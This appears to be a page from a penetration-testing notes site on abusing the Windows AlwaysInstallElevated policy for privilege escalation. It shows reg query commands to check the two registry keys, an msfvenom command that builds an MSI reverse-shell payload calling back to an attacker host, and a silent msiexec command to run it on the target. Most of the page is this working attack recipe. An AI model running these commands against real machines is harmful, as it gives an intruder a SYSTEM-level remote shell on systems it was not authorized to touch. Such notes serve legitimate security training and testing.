AlwaysInstallElevated

The AlwaysInstallElevated policy can be enabled to allow install of a Windows Installer package with elevated (system) privileges.

This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.

To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to 1 under both of the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

The following commands can be used to query the values:

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If both of the values are set to 1, a malicious.msi file can be created (msfvenom) to start a reverse shell with administrative privileges.

Attacker machine

msfvenom -p windows/x64/shell_reverse_tcp lhost=[attacker_ip] lport=[port] -f msi -o malicious.msi

The .msi file can be executed on the target machine with the following command:

C:\> msiexec /quiet /qn /i [path_to_msi_file]

# eg.
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

The Metasploit handler should be started on the attacker machine:

Msfvenom | Offensive Security

AlwaysInstallElevated - Win32 appsMicrosoftLearn

PreviousScheduled tasks NextService misconfigurations

Last updated 5 days ago